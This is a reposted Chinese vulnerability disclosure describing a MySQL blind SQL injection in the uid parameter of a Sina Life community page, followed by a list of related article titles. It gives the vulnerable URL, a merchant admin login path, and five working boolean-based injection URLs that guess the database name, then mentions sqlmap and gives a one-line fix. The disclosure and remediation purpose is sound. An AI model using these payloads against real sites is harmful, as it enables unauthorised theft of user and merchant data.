新浪生活服务互动社区Mysql盲注漏洞的介绍及其修复方法(图解)

所属分类：网络安全 / 安全设置阅读数： 149

收藏 0赞 0分享

注入漏洞存在地址为
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310
其中该漏洞可以导致数据泄漏，其中泄漏的数据包括团购，优惠券、以及用户联系方式，smslog，团购商户、admin等数据。

同时，团购的商户登陆地址为
http://life.sina.com.cn/tuanadmin

漏洞证明：下面为手工猜解数据库名的语句为
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and Length((database()))<5
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=108
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=105
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=102
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=101
下图为注入是返回对正确与错误的截图

注入返回对的情况截图

注入时返回错的情况截图

一下是使用sqlmap对注入点进行注入攻击，一下该例为查询数据库banner，通过改变命令参数可以对其进行更深入的攻击。

修复方案：

对其uid参数进行检查并且进行过滤。

作者 Insight-labs

更多精彩内容其他人还在看

新浪生活服务互动社区Mysql盲注漏洞的介绍及其修复方法(图解)

用IP安全策略自动设置工具的遇到故障与解决方法

分享几个WebSite网站防黑经验

在Windows 下关闭21\23\25端口的方法

招你几教让你防止电脑辐射

教你把电脑屏幕设置成可以保护眼睛的颜色

家庭用路由器功能的详细介绍

你的路由要hold住带宽提速时代

用路由器限制别人的网速的技巧

路由器与路由器互相连接详细设置图文教程

家用无线路由器安全设置必读

网络赚钱

站长故事

新浪生活服务互动社区Mysql盲注漏洞的介绍及其修复方法(图解)

用IP安全策略自动设置工具的遇到故障与解决方法

分享几个WebSite网站防黑经验

在Windows 下关闭21\23\25端口的方法

招你几教 让你防止电脑辐射

教你把电脑屏幕设置成可以保护眼睛的颜色

家庭用路由器功能的详细介绍

你的路由要hold住 带宽提速时代

用路由器限制别人的网速的技巧

路由器与路由器互相连接详细设置图文教程

家用无线路由器安全设置必读

网络赚钱

站长故事

招你几教让你防止电脑辐射

你的路由要hold住带宽提速时代